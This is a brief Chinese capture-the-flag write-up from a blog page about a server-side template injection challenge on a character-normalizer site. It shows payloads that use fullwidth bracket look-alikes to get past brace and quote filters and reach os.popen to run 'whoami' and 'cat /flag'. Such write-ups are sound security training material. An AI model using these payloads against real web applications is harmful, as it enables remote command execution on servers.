太湖杯_easy_web
点进页面可以发现是一个字符规范器,里面原本就带有一句Leonardo,但是可以发现输入参数是特殊字符,输出了正常字符。
知道是SSIT,测试payload发现过滤了英文的{},'',",
通过一开始的字符规范猜测可以用其他的,遂上网搜。
发现果然可行
对单引号也修改
构造payload:
︷︷config.__class__.__init__.__globals__︸︸
︷︷config.__class__.__init__.__globals__['os'].popen('whoami').read()︸︸
︷︷config.__class__.__init__.__globals__['os'].popen('cat /flag').read()︸︸
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17397549.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)